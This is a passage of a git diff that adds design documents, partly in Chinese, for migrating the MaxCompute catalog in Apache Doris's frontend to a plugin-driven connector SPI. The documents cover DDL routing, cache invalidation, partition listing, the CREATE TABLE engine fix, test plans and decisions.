- `InsertOverwriteTableCommand` ~`:407-418`: add a plugin-driven branch — `setOverwrite(true)` + `setStaticPartitionSpec(...)` on `PluginDrivenInsertCommandContext`. +- Consumed by `PluginDrivenTableSink.bindViaWritePlanProvider:212-224` (reads `isOverwrite()` `:217` + `getStaticPartitionSpec()` `:218`). + +### 4.3 The flip +- `CatalogFactory`: add `"max_compute"` to `SPI_READY_TYPES` (`:52`); delete `case "max_compute"` `:146-149` + now-unused import. +- This is the live switch. Keep it the **last** commit (§4.5). + +### 4.4 R-004 — ODPS-SDK-under-plugin-classloader defensive test +Risk (risks.md R-004): "classloader 隔离打破 SDK 单例." Plugin isolation = `ConnectorPluginManager` + `ChildFirstClassLoader`, parent-first prefixes `org.apache.doris.connector.*` / `org.apache.doris.filesystem.*`. No in-repo harness loads a plugin **under its isolated classloader** (`FakeConnectorPluginTest` loads via the test classpath — does NOT exercise isolation). No ODPS endpoint/creds in the repo. + +**Two separable concerns** — split the test accordingly: +1. **Isolation correctness (no creds, CI-runnable):** load the connector under a plugin-style classloader and instantiate the ODPS client (`MCConnectorClientFactory`, needs `mc.endpoint`/`mc.default.project`/auth) — assert **no `NoClassDefFoundError` / `ClassCastException` / SDK-singleton poisoning** when class-loading the ODPS SDK in isolation. This is the part that actually addresses R-004's "broken singleton" risk and can run without a live endpoint. +2. **Live connectivity (creds, user-run):** one trivial metadata call (e.g. `odps.projects().get(project).reload()` or `tables().exists`) against a real endpoint. **I author it; user runs it** (per sign-off; mirrors P0-T24/25). Credentials via env vars / system properties — never committed. + +Cutover is declared complete only after the user reports (2) green; (1) lands as a normal connector UT. + +### 4.5 Commit granularity +All of §4.1+§4.2 is **additive / dormant-safe** (only reachable once `max_compute` is in `SPI_READY_TYPES`). Recommended ordering inside T06: land write-wiring + binding-context + R-004-isolation-UT **first** (dormant), then the **flip** (§4.3) as the final, smallest, highest-signal commit. (DECISION-2: is this two commits `[P4-T06a]`/`[P4-T06b]`, or one `[P4-T06]`?) + +--- + +## 5. Decisions (✅ all signed off 2026-06-06) + +**DECISION-1 ✅ = (A)** `ConnectorWriteOps.usesConnectorTransaction()` flag. — capability signal for the txn-write model (W-b): +- **(A) `ConnectorWriteOps.usesConnectorTransaction()` flag, default false — CHOSEN.** Matches the SPI's existing capability style (`supportsInsert/Delete/Merge`, `supportsWriteBlockAllocation`); explicit; one default method; zero coupling; lets the executor branch *before* any throwing-default call. +- (B) Route on `connector.getWritePlanProvider() != null`. Zero new SPI, but couples "has a write-plan provider" with "uses a connector transaction" — loose; breaks for a future planWrite-but-autocommit connector. +- (C) Un-throw `getWriteConfig` for MC + add `ConnectorWriteType.MAXCOMPUTE` (or reuse `CUSTOM`); route on write-type. Reuses one SPI method conceptually, but reverses D-4, adds enum churn, and forces `getWriteConfig` to be called earlier. More moving parts (Rule 2 disfavors). + +**DECISION-2 ✅ = two commits, flip last** (§4.5): `[P4-T06a]` = wiring/binding/R-004 isolation UT (dormant); `[P4-T06b]` = the SPI_READY_TYPES flip + delete CatalogFactory case. Flip isolated = easiest to review/revert. + +**DECISION-3 ✅ = in the cutover (T06)** (§4.2): static-partition + overwrite binding lands with the cutover, avoiding an INSERT-OVERWRITE-PARTITION regression at the flip. + +--- + +## 6. Risk analysis + +| Risk | Mitigation | +|---|---| +| Flip breaks read/DDL/partition parity | Batch A+B already at parity (gate-green); flip only changes dispatch. Manual smoke per acceptance list. | +| Txn not registered → block-alloc / commit-feedback throw | W-d (G3) — mirror legacy `putTxnById`; UT asserts registration. | +| `planWrite` fail-loud if txn absent on sink session | W-a binding in `finalizeSink` before `bindDataSink`; UT for the executor ordering. | +| INSERT OVERWRITE / static partition regression | §4.2 (DECISION-3 = in cutover). | +| Intermediate (post-GSON, pre-flip) un-deployable state | Land T05+T06 close; don't deploy between (P2 precedent, §3). | +| R-004 SDK-singleton breakage under isolation | §4.4 part 1 (no-creds UT) + part 2 (user-run live). | +| MCInsertExecutor still reachable (double path) | OQ-1 — Batch D verifies it becomes dead code; cutover routes plugin-driven MC to `PluginDrivenInsertExecutor`. | + +--- + +## 7. Test plan + +**Unit (connector + fe-core, JUnit5 hand-doubles, no mockito):** +- `ConnectorSessionImpl` setCurrentTransaction/getCurrentTransaction round-trip. +- `PluginDrivenTransactionManager.begin(connectorTx)` registers in `GlobalExternalTransactionInfoMgr` (getTxnById returns it; commit/rollback removes). +- Executor ordering: txn-model `beginTransaction` creates+registers; `finalizeSink` binds onto sink session before `planWrite`; `beforeExec` skips `beginInsert`. (Fake connector with `usesConnectorTransaction()=true`.) +- Binding-context: INSERT OVERWRITE → `PluginDrivenInsertCommandContext.isOverwrite()==true`; PARTITION(col=val) → `getStaticPartitionSpec()` populated. +- R-004 part 1 (classloader-isolation, no creds). +- (Carries the P4-T10 write-txn golden / TBinaryProtocol round-trip already planned.) + +**User-run / e2e:** R-004 part 2 (live ODPS connectivity). Manual smoke after flip: SELECT, CREATE/DROP TABLE+DB, SHOW PARTITIONS / partitions+partition_values TVF, INSERT, INSERT OVERWRITE [PARTITION]. (regression-test suite under `external_table_p2/maxcompute/` exists but needs a cluster+creds — same DV-003 constraint; defer/flag, do not silently skip.) + +--- + +## 8. Ordered TODO + +**P4-T05 (dormant):** +1. `GsonUtils:397/:472` atomic compat replace. +2. `PluginDrivenExternalTable` getEngine/getEngineTableTypeName `case "max_compute"`; comment on legacyLogTypeToCatalogType default. +3. Gate (fe-core): compile + checkstyle + import-gate (real BUILD/MVN_EXIT/CS_EXIT). Commit `[P4-T05]`. + +**P4-T06 (live):** +4. W-a: `ConnectorSession.setCurrentTransaction` + `ConnectorSessionImpl` field/override + `PluginDrivenTableSink.getConnectorSession`. +5. W-b: `ConnectorWriteOps.usesConnectorTransaction()` + MC override (per DECISION-1). +6. W-c: `PluginDrivenInsertExecutor` restructure. +7. W-d: `PluginDrivenTransactionManager.begin(connectorTx)` global register + commit/rollback deregister. +8. §4.2: `UnboundConnectorTableSink` static spec + `InsertInto`/`InsertOverwrite` fill `PluginDrivenInsertCommandContext` (per DECISION-3). +9. R-004 part-1 UT; author R-004 part-2 (user-run). +10. UTs (§7). Gate `-pl :fe-connector-maxcompute,:fe-connector-api,:fe-core -am` compile + checkstyle + import-gate. +11. **Flip:** `CatalogFactory` SPI_READY_TYPES + delete case (`[P4-T06b]` or final part of `[P4-T06]`, per DECISION-2). +12. doc-sync (5 steps) + decisions-log (DECISION-1/2/3, the 2 SPI additions → E11). + +--- + +## 9. Open questions / boundaries +- **Don't** re-open T03/T04 decisions (Approach A locked; planWrite reads `getCurrentTransaction`). This design wires *to* it. +- `transactionType()` for a generic txn-model executor returning `MAXCOMPUTE` is profiling-only and MC-is-sole-adopter-correct; revisit when a 2nd txn-model connector arrives. +- Batch D (post-cutover) still owns: exhaustive reverse-ref re-grep, deleting `datasource/maxcompute/`, verifying `MCInsertExecutor` dead (OQ-1). diff --git a/plan-doc/tasks/designs/P4-T06c-fe-dispatch-wiring-design.md b/plan-doc/tasks/designs/P4-T06c-fe-dispatch-wiring-design.md new file mode 100644 index 00000000000000..93fe8ed19bec4c --- /dev/null +++ b/plan-doc/tasks/designs/P4-T06c-fe-dispatch-wiring-design.md @@ -0,0 +1,254 @@ +# P4-T06c — FE 分发接线:DDL / 分区内省 → 已有 SPI([D-028]) + +> 状态:**DESIGN(待批准)** · 分支 `catalog-spi-05` · 前置:T06b flip 已落(`2b135899411`) +> 关联:[P4-T05-T06 cutover design](./P4-T05-T06-cutover-design.md)(Batch C,已落)· [Batch D 移除设计](./P4-batchD-maxcompute-removal-design.md)(前置门 = 本任务落 + live 绿) +> 决策:[D-028](翻闸前全补 FE 分发接线,通用 PluginDriven 实现,非 MC 专有) + +--- + +## 1. 背景与问题 + +T06b 翻闸后,`max_compute` catalog 实例化为 `PluginDrivenExternalCatalog`(`metadataOps` 永为 `null`)。该类**仅 override `createTable`**,其余元数据写/内省操作的 FE 分发仍按 legacy `instanceof MaxComputeExternalCatalog` 路由 → 翻闸后落空。连接器侧方法(P4-T01/T02)**已存在**,本任务只补 **FE 接线**。 + +### 1.1 翻闸后回归矩阵(已 file:line 核实,当前行号) + +| Smoke 项 | 现状 | 根因(当前行号) | +|---|---|---| +| SELECT / CREATE TABLE / INSERT 全家 | ✅ 已通 | 读路径 + `createTable` override + 写链路(T06a) | +| **DROP TABLE** | ❌ `Drop table is not supported` | `ExternalCatalog.java:1105`(`metadataOps==null`,未 override) | +| **CREATE DB** | ❌ `Create database is not supported` | `ExternalCatalog.java:1004` | +| **DROP DB** | ❌ `Drop database is not supported` | `ExternalCatalog.java:1029` | +| **SHOW PARTITIONS** | ❌ `Catalog of type 'max_compute' is not allowed` | `ShowPartitionsCommand.java:202-204` allow-list + `:255` 表类型校验 + `:415` dispatch | +| **partitions() TVF** | ❌ `not support catalog` | `MetadataGenerator.java:1310` instanceof 分发落空 | + +### 1.2 ⚠️ 本设计新发现(超出 HANDOFF 原计划):**FE 元数据缓存失效缺口** + +legacy `MaxComputeMetadataOps` 在 DDL 成功后会失效 FE 本地缓存(`afterX` 钩子);该钩子在 **master**(`metadataOps.createDb`→`afterCreateDb`)与 **follower**(`replayX`→`afterX`)两路均被触发。`PluginDrivenExternalCatalog` 的 `metadataOps==null` → **两路均 no-op** → DDL 后同一 FE 的 `SHOW DATABASES/TABLES` 缓存陈旧(直到 TTL/手动 REFRESH)。 + +legacy `afterX` 实际做的失效(已核实 `MaxComputeMetadataOps.java`): + +| Op | legacy `afterX` 失效动作 | 可达性(PluginDriven 可直接调) | +|---|---|---| +| createDb | `resetMetaCacheNames()` | `ExternalCatalog.java:1494` public | +| dropDb | `unregisterDatabase(dbName)` | `ExternalCatalog.java:1142` public | +| createTable | `db.resetMetaCacheNames()` | `ExternalDatabase.java:628` public(`getDbForReplay` @ `:842`) | +| dropTable | `db.unregisterTable(tblName)` | `ExternalDatabase.java:552` public | + +**推论**:已落的 `createTable` override(`PluginDrivenExternalCatalog.java:257-277`)**缺** `db.resetMetaCacheNames()` → 翻闸已引入一处缓存陈旧回归(CREATE TABLE 后新表不立即出现在缓存表名列表)。本任务的新 override 若仅"镜像 createTable"会继承同一缺口。**故本设计将缓存失效纳入范围**,并顺带修复 `createTable`。 + +> 这是 Rule 7(surface conflicts)/ Rule 12(fail loud)触发点:HANDOFF 原计划写"镜像 createTable override",但 createTable 自身缺缓存失效 → 单纯镜像 ≠ 与 legacy 行为对齐。 + +--- + +## 2. 目标 / 非目标 + +### 目标 +- G1:`PluginDrivenExternalCatalog` override `createDb` / `dropDb` / `dropTable`,路由到 `connector.getMetadata(session).{createDatabase/dropDatabase/dropTable}`,写 editlog,并失效 FE 缓存(master 路)。 +- G2:`SHOW PARTITIONS` 接受 `PluginDrivenExternalCatalog` + `PLUGIN_EXTERNAL_TABLE`,新增 handler 经 SPI `listPartitionNames` 取分区。 +- G3:`partitions()` TVF 接受 `PluginDrivenExternalCatalog`,新增 helper 经 SPI `listPartitionNames` 构造结果。 +- G4:补缓存失效一致性:新 3 个 DDL override + 修复已落 `createTable` + follower 侧 `replayX`(见 §6 决策)。 +- G5:UT 覆盖(DDL 路由 / 缓存失效 / ShowPartitions+TVF PluginDriven 分支)。 +- **成功判据**:fe-core gate 绿(compile + checkstyle 0 + import-gate)+ UT 绿 + **用户 live 验证 11 项全绿**(runbook 见 HANDOFF)。 + +### 非目标 +- **RENAME TABLE**:SPI/任何连接器**无** `renameTable`(grep 零命中)→ 需先加 SPI 方法 + 连接器实现,**不在 T06c**。不在 live smoke 列表。`ExternalCatalog.renameTable:1082` 保持基类抛"not supported"。 +- **partition_values() TVF**:OQ-5 **已解** —— `MetadataGenerator.java:2081` switch 仅 `HMS_EXTERNAL_TABLE` 一例;`MAX_COMPUTE_EXTERNAL_TABLE` 从不在内 → legacy MC **从未支持** → **非回归**,不补。 +- 连接器侧改动:方法已存在(P4-T01/T02),本任务零连接器改动(守门只 `-pl :fe-core -am`)。 +- IF NOT EXISTS / FORCE 的连接器级语义增强(见 §5 边界,FE 侧按现有契约桥接)。 + +--- + +## 3. 架构 / 数据流 + +所有改动集中 fe-core,通用 keyed on `PluginDrivenExternalCatalog` / `TableType.PLUGIN_EXTERNAL_TABLE`(非 MC 专有,自动惠及 jdbc/es/trino 同类缺口;并使 Batch D 退化为"删残留 legacy MC 引用")。 + +``` +DDL: Nereids Command → ExternalCatalog.{createDb/dropDb/dropTable} + → [T06c override on PluginDrivenExternalCatalog] + → connector.getMetadata(buildConnectorSession()).{createDatabase/dropDatabase/dropTable} + → editlog + 缓存失效 +SHOW PARTITIONS: ShowPartitionsCommand.{validate→analyze→handleShowPartitions} + → [T06c: allow-list + 表类型 + dispatch 分支] → handleShowPluginDrivenTablePartitions() + → getConnector().getMetadata(session).getTableHandle(...).listPartitionNames(session, handle) +partitions() TVF: MetadataGenerator.partitionMetadataResult() + → [T06c: instanceof PluginDrivenExternalCatalog 分支] → dealPluginDrivenCatalog() + → 同上 SPI listPartitionNames → 单 string 列 TRow(镜像 dealMaxComputeCatalog 形状) +``` + +### SPI 目标方法(均已在 `MaxComputeConnectorMetadata` 实现) +| FE 调用 | SPI 方法 | 备注 | +|---|---|---| +| createDb | `createDatabase(session, dbName, properties)` `ConnectorSchemaOps:48` | **无 ifNotExists** 参数 | +| dropDb | `dropDatabase(session, dbName, ifExists)` `ConnectorSchemaOps:55` | **无 force** 参数 | +| dropTable | `dropTable(session, handle)` `ConnectorTableOps:92` | **takes handle,无 ifExists**;先 `getTableHandle` | +| 分区内省 | `listPartitionNames(session, handle)` `ConnectorTableOps:158` | **无 skip/limit**;FE 侧 applyLimit | +| 解析 handle | `getTableHandle(session, db, tbl)` `ConnectorTableOps:36` → `Optional` | | + +--- + +## 4. 详细改动(5 站点 + 缓存) + +### 4.1 `PluginDrivenExternalCatalog.java`(DDL override,镜像 `createTable:257`) + +新增 3 个 override(签名严格对齐基类,见 `ExternalCatalog:1002/1027/1102`): + +**`createDb(String dbName, boolean ifNotExists, Map properties)`** +``` +makeSureInitialized(); +if (ifNotExists && getDbNullable(dbName) != null) { return; } // honor IF NOT EXISTS(FE 侧,SPI 无此参) +ConnectorSession session = buildConnectorSession(); +try { connector.getMetadata(session).createDatabase(session, dbName, properties); } +catch (DorisConnectorException e) { throw new DdlException(e.getMessage(), e); } +Env.getCurrentEnv().getEditLog().logCreateDb(new CreateDbInfo(getName(), dbName, null)); // org.apache.doris.persist.CreateDbInfo +resetMetaCacheNames(); // 缓存失效(= legacy afterCreateDb) +``` + +**`dropDb(String dbName, boolean ifExists, boolean force)`** +``` +makeSureInitialized(); +if (getDbNullable(dbName) == null) { if (ifExists) return; else throw new DdlException("..."); } +ConnectorSession session = buildConnectorSession(); +try { connector.getMetadata(session).dropDatabase(session, dbName, ifExists); } // force 不传(SPI 无此参,见 §5) +catch (DorisConnectorException e) { throw new DdlException(e.getMessage(), e); } +Env.getCurrentEnv().getEditLog().logDropDb(new DropDbInfo(getName(), dbName)); +unregisterDatabase(dbName); // 缓存失效(= legacy afterDropDb) +``` + +**`dropTable(String dbName, String tableName, boolean isView, boolean isMtmv, boolean isStream, boolean ifExists, boolean mustTemporary, boolean force)`** +``` +makeSureInitialized(); +ConnectorSession session = buildConnectorSession(); +Optional handle = connector.getMetadata(session).getTableHandle(session, dbName, tableName); +if (!handle.isPresent()) { if (ifExists) return; else throw new DdlException("Failed to get table: ..."); } +try { connector.getMetadata(session).dropTable(session, handle.get()); } +catch (DorisConnectorException e) { throw new DdlException(e.getMessage(), e); } +Env.getCurrentEnv().getEditLog().logDropTable(new DropInfo(getName(), dbName, tableName)); +getDbForReplay(dbName).ifPresent(db -> db.unregisterTable(tableName)); // 缓存失效(= legacy afterDropTable) +``` + +**修复已落 `createTable`**(§1.2):editlog 后补 +``` +getDbForReplay(createTableInfo.getDbName()).ifPresent(db -> db.resetMetaCacheNames()); // = legacy afterCreateTable +``` + +新 import:`org.apache.doris.persist.{CreateDbInfo, DropDbInfo, DropInfo}`、`org.apache.doris.connector.api.handle.ConnectorTableHandle`、`java.util.Optional`(`Map` 已有)。`getMetadata(session)` 每调一次(不缓存,连接器 stateless)。 + +### 4.2 follower 缓存失效(`ExternalCatalog.java` replayX,见 §6 决策 A) +`replayCreateDb:1020` / `replayDropDb:1042` / `replayCreateTable:1075` / `replayDropTable:1130` 现仅 `if (metadataOps != null) metadataOps.afterX()`。补 `else` 分支做等价失效(仅 `metadataOps==null` 即 PluginDriven 走到;HMS/Iceberg 等非 null,行为不变): +``` +} else { // PluginDriven path + resetMetaCacheNames(); // createDb + // dropDb: unregisterDatabase(dbName); + // createTable: getDbForReplay(dbName).ifPresent(d -> d.resetMetaCacheNames()); + // dropTable: getDbForReplay(dbName).ifPresent(d -> d.unregisterTable(tblName)); +} +``` + +### 4.3 `ShowPartitionsCommand.java`(3 gate + handler) +1. **allow-list**(`validate()` :202-204):`|| catalog instanceof PluginDrivenExternalCatalog` +2. **表类型校验**(`analyze()` :255):`getTableOrMetaException(..., TableType.PLUGIN_EXTERNAL_TABLE)` 追加 +3. **dispatch**(`handleShowPartitions()` :415,**在 final else 前**插入): + `else if (catalog instanceof PluginDrivenExternalCatalog) return handleShowPluginDrivenTablePartitions();` +4. 新 handler(镜像 `handleShowMaxComputeTablePartitions:286` 形状,但走 SPI): +``` +PluginDrivenExternalCatalog pdc = (PluginDrivenExternalCatalog) catalog; +ConnectorSession session = pdc.buildConnectorSession(); +ConnectorMetadata md = pdc.getConnector().getMetadata(session); +ConnectorTableHandle handle = md.getTableHandle(session, tableName.getDb(), tableName.getTbl()) + .orElseThrow(() -> new AnalysisException("table not found: " + tableName.getTbl())); +List names = md.listPartitionNames(session, handle); // SPI 无 skip/limit +// 构单列行 + sort + applyLimit(limit, offset, rows)(同 HMS/Paimon handler);filterMap 忽略(同 MC handler) +``` + import 追加 `PluginDrivenExternalCatalog`、SPI 类型。注意 `isPartitionedTable()`(:257)须对 `PluginDrivenExternalTable` 正确返回(验证项)。 + +### 4.4 `MetadataGenerator.java`(partitions() TVF 分支 + helper) +`partitionMetadataResult()`(:1308 dispatch 链)在 MC 分支旁/前加: +``` +} else if (catalog instanceof PluginDrivenExternalCatalog) { + return dealPluginDrivenCatalog((PluginDrivenExternalCatalog) catalog, (ExternalTable) table); +} +``` +新 helper `dealPluginDrivenCatalog`(镜像 `dealMaxComputeCatalog:1337` 的 TRow/TCell 单 string 列形状 + `TStatusCode.OK`): +``` +ConnectorSession session = catalog.buildConnectorSession(); +ConnectorMetadata md = catalog.getConnector().getMetadata(session); +ConnectorTableHandle handle = md.getTableHandle(session, table.getDbName(), table.getName())....; // 名称约定见 §5 +List names = md.listPartitionNames(session, handle); +// 每名一 TRow(单 TCell setStringVal) → dataBatch + TStatus OK +``` + +--- + +## 5. 边界 / 已知语义差(fail loud) + +- **createDb 无 `ifNotExists`(SPI)**:FE override 先 `getDbNullable` 预检兑现 IF NOT EXISTS(存在则跳过、不写 editlog/不调 SPI)。 +- **dropDb 无 `force`(SPI)**:`force` 参数被丢弃,仅传 `ifExists`。legacy `dropDbImpl` 的 force=级联删表逻辑(先 drop 库内全表)**不复刻**;MaxCompute 侧 dropDb 由连接器处理。若日后需级联 → 连接器侧增强(记 OQ)。 +- **dropTable handle 解析**:SPI 用 `ConnectorTableHandle` 非 (db,tbl);FE 先 `getTableHandle`,空 Optional 即"表不存在"→ ifExists 静默返回 / 否则抛。IF EXISTS 语义落在 FE,远端 drop 幂等。 +- **分区名 db/tbl 名称约定**:`getTableHandle` 传本地名还是 remote 名 —— 对齐 `PluginDrivenExternalCatalog.tableExist:222`(传入 db/tbl,连接器内部解析 remote 映射)。ShowPartitions 用 `tableName.getDb()/getTbl()`;TVF 用 `table.getDbName()/getName()`。**实现时核连接器 `getTableHandle` 契约**(验证项)。 +- **listPartitionNames 无 skip/limit**:offset/limit 在 FE handler 用既有 `applyLimit` 兜(不下推连接器)。SPI default 返回 `emptyList()` → 未 override 的连接器优雅显示 0 分区(非报错)。 + +--- + +## 6. 🔴 待批准决策 + +### 决策 A — 缓存失效深度(核心) +| 方案 | master(live 单 FE) | follower(HA 多 FE) | 改动面 | 一致性 | +|---|---|---|---|---| +| **A1(推荐)全对齐** | ✅ override 内失效 | ✅ replayX else 分支失效 | DDL override + `ExternalCatalog` 4 个 replayX + 修 createTable | 与 legacy 完全对齐 | +| A2 仅 master | ✅ override 内失效 | ❌ TTL 前陈旧 | 仅 DDL override(不动 replayX/createTable) | live 绿但 HA 有差 | +| A3 不补(纯镜像 createTable) | ❌ 可能陈旧 | ❌ | 最小 | **风险 live 不绿** | + +**推荐 A1**:与 legacy 行为完全对齐,HA 正确,且顺带修复 createTable 已引入的缓存回归。`else` 分支只在 `metadataOps==null` 触发,对 HMS/Iceberg 零影响(surgical)。 + +### 决策 B — 是否在 T06c 内修复已落 `createTable` 的缓存缺口 +- **推荐 是**:缓存失效是同一翻闸回归主题,不修则 createTable 与新 3 op 行为不一致。会触碰已 commit 代码(T05/T06a),commit message 明确标注。 +- 否:createTable 留缺口(不一致),另开任务。 + +### 决策 C — 提交粒度(每 commit 独立,用户定时机) +- C1(推荐)3 commit:① DDL override + 缓存(含 createTable 修 + replayX)+ UT;② SHOW PARTITIONS + UT;③ partitions() TVF + UT。 +- C2 1 commit 全量。 + +--- + +## 7. 测试(Rule 9:测意图) + +模块/框架:fe-core = JUnit5 + Mockito。模板 = `PluginDrivenExternalCatalogConcurrencyTest` 的 `TestablePluginCatalog`(注 mock `Connector`,反射注入 private `connector` 字段,stub `buildConnectorSession`/`initLocalObjectsImpl` 绕 Env)。现有 0 个测试覆盖 createTable override 路由 / ShowPartitions 外表 dispatch / MetadataGenerator(无 MetadataGeneratorTest)。 + +- **T1 `PluginDrivenExternalCatalogDdlRoutingTest`(新,fe-core)**: + - createDb/dropDb/dropTable 调到 mock `ConnectorMetadata` 对应方法(verify 调用 + 参数)。 + - `DorisConnectorException` → `DdlException` 包裹。 + - dropTable 先 `getTableHandle`;空 Optional + ifExists → 静默;空 + !ifExists → 抛。 + - **缓存失效断言**(编码 WHY):DDL 成功后对应 `resetMetaCacheNames`/`unregisterDatabase`/`unregisterTable` 被触发(spy catalog/db)—— 即"翻闸后 catalog DDL 须与 legacy 一样使同 FE 缓存可见新状态"。 + - createTable 修复后亦 verify `db.resetMetaCacheNames()`。 + - editlog:stub/避开(真 Env 单例可用,或只验 SPI 调用 + 异常包裹 + 缓存)。 +- **T2 ShowPartitions + MetadataGenerator PluginDriven 分支**:断言 `type=max_compute` 的 `PluginDrivenExternalCatalog` 现被 allow-list 接受、表类型校验过 `PLUGIN_EXTERNAL_TABLE`、dispatch 路由到 SPI `listPartitionNames`(编码 WHY:迁移后 MC catalog 须保持 SHOW PARTITIONS / partitions-TVF 可用)。重型可用 `TestWithFeService`,或聚焦单测 dispatch 分支。 + +守门(坑6/7/8): +``` +mvn -f /mnt/disk1/yy/git/wt-catalog-spi/fe/pom.xml -pl :fe-core -am \ + -Dmaven.build.cache.enabled=false -Dcheckstyle.skip=true -DskipTests test-compile # 后台,读 BUILD/MVN_EXIT +mvn -f /mnt/disk1/yy/git/wt-catalog-spi/fe/pom.xml -pl :fe-core \ + -Dmaven.build.cache.enabled=false checkstyle:check +bash tools/check-connector-imports.sh +# UT:-pl :fe-core -Dtest=PluginDrivenExternalCatalogDdlRoutingTest,... test +``` +live 验证:HANDOFF runbook(Layer1 连通 + Layer2 全链路 11 项),目标全绿 → 解锁 Batch D。 + +--- + +## 8. 风险 / 回滚 +- flip(T06b)与本任务独立可 revert;**live 未绿前勿删 legacy**(Batch D 在后)。 +- replayX `else` 分支误伤其他 catalog:已规避(仅 `metadataOps==null`)。需 fe-core UT + 编译守门确认 HMS/Iceberg 路径不变。 +- 名称约定(local vs remote)若桥接错 → 分区/drop 找不到表;实现时核 `getTableHandle` 契约 + UT。 + +--- + +## 9. 有序 TODO +> 决策:A1(全对齐)+ C1(三 commit)已批准。实现状态见下(gate 均 file:line 验证:compile BUILD SUCCESS / checkstyle 0 / import-gate 0)。 +1. [x] `PluginDrivenExternalCatalog`:override createDb/dropDb/dropTable + 缓存失效 + 修 createTable;imports。 +2. [x] `ExternalCatalog` 4× replayX 加 `else`(决策 A1)。 +3. [x] `PluginDrivenExternalCatalogDdlRoutingTest`(T1)—— **12/12 绿**。 +4. [x] commit ① 改动 gate 绿(compile + checkstyle 0 + import-gate 0 + UT 12)。**待 commit(用户定时机)**。 +5. [x] `ShowPartitionsCommand` 3 gate + handler;`ShowPartitionsCommandPluginDrivenTest`。gate 绿。**待 commit**。 +6. [x] `MetadataGenerator` 分支 + `dealPluginDrivenCatalog`;`MetadataGeneratorPluginDrivenTest`。gate 绿。**待 commit**。 +7. [ ] 用户跑 live 验证 11 项;全绿 → 更新 HANDOFF/decisions-log([D-028] 落)→ 解锁 Batch D。 diff --git a/plan-doc/tasks/designs/P4-T06d-FIX-DDL-ENGINE-design.md b/plan-doc/tasks/designs/P4-T06d-FIX-DDL-ENGINE-design.md new file mode 100644 index 00000000000000..1b1b819bce8c73 --- /dev/null +++ b/plan-doc/tasks/designs/P4-T06d-FIX-DDL-ENGINE-design.md @@ -0,0 +1,248 @@ +# P4-T06d — FIX-DDL-ENGINE — no-ENGINE CREATE TABLE under PluginDriven max_compute + +Status: design (revised, post-critic). Scope: fe-core only, single file +`CreateTableInfo.java` (1 import + 2 branch insertions + 1 private helper) + 1 CI-runnable UT. +Severity: blocker. Layer: fe-core. Depends on / unblocks: Batch-D removal ordering (see §Batch-D). + +This per-issue doc supersedes the parent `P4-cutover-fix-design.md` FIX-DDL-ENGINE section. It +folds in the parent critic's `needs-revision` corrections (verbatim verified against the current +tree) **and** one design refinement the parent missed (null-returning helper — §Design 3). + +## Problem +After the `max_compute` cutover (T06b), a `max_compute` catalog instantiates as +`PluginDrivenExternalCatalog` (`CatalogFactory` SPI_READY_TYPES contains `max_compute`). A user +running a `CREATE TABLE` **without an explicit `ENGINE=maxcompute` clause** (the most common MC +form — `test_max_compute_create_table.groovy` Test1/2/3 all omit ENGINE) gets, at **analysis +time**, `AnalysisException: Current catalog does not support create table: `. It never reaches +`PluginDrivenExternalCatalog.createTable` (which IS implemented and works). Legacy-usable, +cutover-broken → blocker regression. CTAS (`CREATE TABLE ... AS SELECT`) is broken identically +(§Root Cause). + +## Root Cause +`CreateTableInfo` infers a missing engine and validates engine/catalog consistency by `instanceof` +on the **legacy concrete subclass** `MaxComputeExternalCatalog`. After cutover the catalog is +`PluginDrivenExternalCatalog`, matching none of the branches: + +1. `paddingEngineName` (`CreateTableInfo.java:896-918`): when `engineName` is empty it walks + `InternalCatalog`/`HMSExternalCatalog`/`IcebergExternalCatalog`/`PaimonExternalCatalog`/ + `MaxComputeExternalCatalog` (MC branch `:912-913 → ENGINE_MAXCOMPUTE`); no match → + `:914-915 throw "Current catalog does not support create table"`. +2. `checkEngineWithCatalog` (`:376-393`): the symmetric consistency check; + `:390 else if (catalog instanceof MaxComputeExternalCatalog && !engineName.equals(ENGINE_MAXCOMPUTE)) throw`. + After cutover an **explicitly** written `ENGINE=maxcompute` silently bypasses this check (no + `throw`, not a crash) — a mirror gap that should be fixed for parity. +3. `validateCreateTableAsSelect` (`:923-926`) also calls `paddingEngineName(catalogName, ctx)` → + **CTAS into a max_compute PluginDriven catalog is equally broken pre-fix and equally fixed.** + +Both gate methods re-fetch the catalog **by name** via +`Env.getCurrentEnv().getCatalogMgr().getCatalog(ctlName)` (`:899`, `:383`) — they ignore any +directly-constructed catalog object (drives the UT design, §Test Plan). + +Verified type-string facts: +- `PluginDrivenExternalCatalog.getType()` returns the lowercase catalog-type prop + (`catalogProperty.getOrDefault(CatalogMgr.CATALOG_TYPE_PROP="type", …)`) → `"max_compute"` for a + MC catalog — the same key `PluginDrivenExternalTable.getEngine()/getEngineTableTypeName()` switch + on. +- `ENGINE_MAXCOMPUTE = "maxcompute"` (`:125`) — **no underscore**; getType is `"max_compute"` **with** + underscore. The helper must map between them. +- **Must NOT** reuse `TableType.MAX_COMPUTE_EXTERNAL_TABLE.toEngineName()`: that enum has no case in + `TableIf.toEngineName()` → returns `null` (confirmed; `PluginDrivenExternalTable.getEngine()` + itself documents this null). Mapping must be a direct literal `"max_compute" → ENGINE_MAXCOMPUTE`. +- Downstream is satisfied once padded: `checkEngineName` (`:940-944`) and `analyzeEngine` + (`:1121-1127`) whitelist `ENGINE_MAXCOMPUTE`, so producing `"maxcompute"` makes the rest of the + path byte-identical to legacy with zero further edits. + +## Design +Mirror the in-repo convention `PluginDrivenExternalTable.getEngine()` (switch on +`((PluginDrivenExternalCatalog) catalog).getType()`): add a `PluginDrivenExternalCatalog` branch to +both gate methods, keyed on `getType()` (not a hardcoded `instanceof MaxComputeExternalCatalog`), so +it generalizes to any future full-adopter and survives Batch-D deleting the legacy MC branch. + +1. **Import** — add `import org.apache.doris.datasource.PluginDrivenExternalCatalog;`. **Placement + (critic correction):** immediately after `:49 org.apache.doris.datasource.InternalCatalog` and + **before** `:50 org.apache.doris.datasource.hive.HMSExternalCatalog`. Rationale: Checkstyle + `CustomImportOrder` is ASCII-case-sensitive; after `org.apache.doris.datasource.` the next char is + uppercase `P` (0x50) for PluginDriven vs lowercase `h`/`i`/`m`/`p` (≥0x68) for the + `hive.`/`iceberg.`/`maxcompute.`/`paimon.` sub-packages, so `P` sorts **before** all of them and + **after** `I` (InternalCatalog, 0x49). Grouped with the top-level `datasource.*` classes + (`CatalogIf :48`, `InternalCatalog :49`), NOT after the sub-packages. (The parent design's + "between :51/:52, after MaxCompute" was off-by-two and would put it after `hive`/`iceberg` → + Checkstyle reject.) + +2. **`paddingEngineName`** — insert after the MC branch (`:913`), before the `:914 else`: + ```java + } else if 